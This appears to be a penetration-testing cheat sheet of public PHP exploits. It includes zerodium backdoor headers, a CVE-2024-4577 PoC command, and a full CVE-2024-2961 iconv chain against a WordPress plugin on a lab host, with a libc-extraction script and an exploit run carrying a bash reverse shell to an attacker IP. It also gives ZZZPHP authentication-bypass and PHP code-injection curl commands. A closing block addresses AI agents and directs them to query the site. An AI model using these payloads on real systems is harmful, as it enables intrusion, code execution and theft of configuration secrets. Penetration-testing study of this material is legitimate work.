# PHP
{% embed url="" %}
## PHP 8.1.0-dev
Try RCE & SQLi
```
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
```
## PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
```
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
```
{% embed url="" %}
```
python watchTowr-vs-php_cve-2024-4577.py -c "" -t http://192.168.253.132/test.sina
```
## Iconv
{% embed url="" %}
{% embed url="" %}
### LFI
For buddyforms 2.7.7
{% embed url="" %}
```
# python lfi.py
Remote File Read - CVE-2024-2961
Enter the path of the file you want to read (e.g., /etc/passwd): ../wp-config.php
Enter a numeric ID for the upload (e.g., 1): 1
File uploaded successfully: http://host.htb/wp-content/uploads/2025/01/1-17.png
GIF89a\nM
```
### RCE
Find `libc.so` path on the target machine
```
# curl 'http://host.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/proc/self/maps' -v
<-SNIP->
{"status":"OK","response":"http:\/\/host.htb\/wp-content\/uploads\/2025\/01\/1-21.png","attachment_id":191}#
```
```
# curl http://host.htb/wp-content/uploads/2025/01/1-21.png | grep libc.so
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 07f29c1467000-7f29c148d000 r--p 00000000 00:3b 292782 /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c148d000-7f29c15e2000 r-xp 00026000 00:3b 292782 /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c15e2000-7f29c1635000 r--p 0017b000 00:3b 292782 /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c1635000-7f29c1639000 r--p 001ce000 00:3b 292782 /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c1639000-7f29c163b000 rw-p 001d2000 00:3b 292782 /usr/lib/x86_64-linux-gnu/libc.so.6
100 72048 100 72048 0 0 169k 0 --:--:-- --:--:-- --:--:-- 169k
```
Download `libc.so`
```
# curl 'http://host.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/usr/lib/x86_64-linux-gnu/libc.so.6' -v
* Trying 10.10.11.52:80...
* Connected to host.htb (10.10.11.52) port 80 (#0)
> POST /wp-admin/admin-ajax.php HTTP/1.1
> Host: host.htb
> User-Agent: curl/7.88.1
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 2069
>
< HTTP/1.1 200 OK
< Date: Tue, 28 Jan 2025 08:41:14 GMT
< Server: Apache/2.4.62 (Debian)
< X-Powered-By: PHP/8.3.2
< X-Robots-Tag: noindex
< X-Content-Type-Options: nosniff
< Expires: Wed, 11 Jan 1984 05:00:00 GMT
< Cache-Control: no-cache, must-revalidate, max-age=0
< Referrer-Policy: strict-origin-when-cross-origin
< X-Frame-Options: SAMEORIGIN
< Vary: Accept-Encoding
< Content-Length: 115
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host host.htb left intact
{"status":"OK","response":"http:\/\/host.htb\/wp-content\/uploads\/2025\/01\/1-22.png","attachment_id":191}#
```
```
# wget http://host.htb/wp-content/uploads/2025/01/1-22.png
```
Clean and add missing headers:
1 - On your host, find the starting offset of `libc.so` section headers corresponding to the same version as on the victim, here `libc.so.6`
```
# readelf -S /lib/x86_64-linux-gnu/libc.so.6
There are 64 section headers, starting at offset 0x1d4458:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
<-SNIP->
```
Here the starting offset is `0x1d4458`
2 - Extract libc.so from png file
```
# cat cleanPngToElf.py
import os
import shutil
def extract_libc(png_path, output_path, start_offset, total_size):
"""
Extract libc.so.6 data from a PNG file.
"""
with open(png_path, 'rb') as png_file:
# Read the exact number of bytes for libc.so.6
png_file.seek(start_offset)
extracted_data = png_file.read(total_size)
with open(output_path, 'wb') as output_file:
output_file.write(extracted_data)
print(f"Extracted libc.so.6 data to {output_path}")
print(f"Extracted size: {len(extracted_data)} bytes")
def append_valid_section_headers(libc_path, reference_libc_path):
"""
Append valid section headers from a reference libc.so.6 to the extracted file.
"""
with open(reference_libc_path, 'rb') as ref_file:
ref_file.seek(section_headers_offset)
section_headers_data = ref_file.read(total_section_headers_size)
with open(libc_path, 'ab') as libc_file:
libc_file.write(section_headers_data)
print(f"Appended section headers from reference libc.so.6.")
# Paths to files
png_file_path = '1-22.png'
reference_libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
output_libc_path = 'libc.so.7'
# Known offsets and sizes
elf_start_offset = 9 # ELF header start offset in 1-40.png
section_headers_offset = 0x1D4458 # Section headers offset in reference libc.so.6
total_section_headers_size = 60 * 64 # 60 section headers, each 64 bytes
total_size = section_headers_offset + total_section_headers_size - elf_start_offset # Full size of libc.so.6
# Step 1: Extract the main ELF data from png file
extract_libc(
png_path=png_file_path,
output_path=output_libc_path,
start_offset=elf_start_offset,
total_size=total_size
)
# Step 2: Append section headers from the reference libc.so.6
append_valid_section_headers(
libc_path=output_libc_path,
reference_libc_path=reference_libc_path
)
print(f"Fixed libc.so.6 saved to: {output_libc_path}")
```
```
# python cleanPngToElf.py .py
Extracted libc.so.6 data to libc.so.7
Extracted size: 1921871 bytes
Appended section headers from reference libc.so.6.
Fixed libc.so.6 saved to: libc.so.7
# file libc.so.7
libc.so.7: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=82ce4e6e4ef08fa58a3535f7437bd3e592db5ac0, for GNU/Linux 3.2.0, stripped
```
Exploit
{% embed url="" %}
Put the cleaned libc.so into LIBC\_FILE
```
# python3 exploit.py 'http://host.htb/wp-admin/admin-ajax.php' 'bash -c "bash -i >& /dev/tcp/10.10.X.X/4444 0>&1"'
```
## Extract
Allow to redefines variables defined in the code before extract() is used
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
## ZZZPHP
### ISSESSION adminid Authentication Bypass
```
curl -i -X GET "http://$TARGET_HOST/admin871/?index" \
-H "Cookie: zzz_adminid=1"
curl -b "PHPSESSID=abcdef123456; zzz_adminid=1" http://target.com/admin.php
```
### parserIfLabel eval PHP Code Injection
```
curl -X POST "http://$TARGET_HOST/admin871/save.php?act=editfile" \
-H "Cookie: zzz_adminid=1" \
-d "file=/template/pc/cn2016/html/search.html&filetext=
{if:phpinfo()}{end if}"
```
This command sends a POST request to edit `search.html` , injecting the PHP code `phpinfo()` into it.
After injecting the PHP code, accessing the search.html page or triggering its rendering will execute the injected code.
### Ev1l eva1 bypass
```
curl -X POST "http://victime.com/vuln.php" \
-d "user_input=assert&server_input=&cookie_input=" \
-H "Cookie: session=" \
-H "X-Custom-Header: "
```
```
curl -X POST "http://victime.com/vuln.php" \
-d "user_input=assert('phpinfo();')" \
-H "Cookie: session=assert('phpinfo();')" \
-H "X-Custom-Header: assert('phpinfo();')"
```
## XXE in PHP
{% embed url="" %}
{% embed url="" %}
## Pearcmd - LFI to RCE
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/public-exploit/php.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.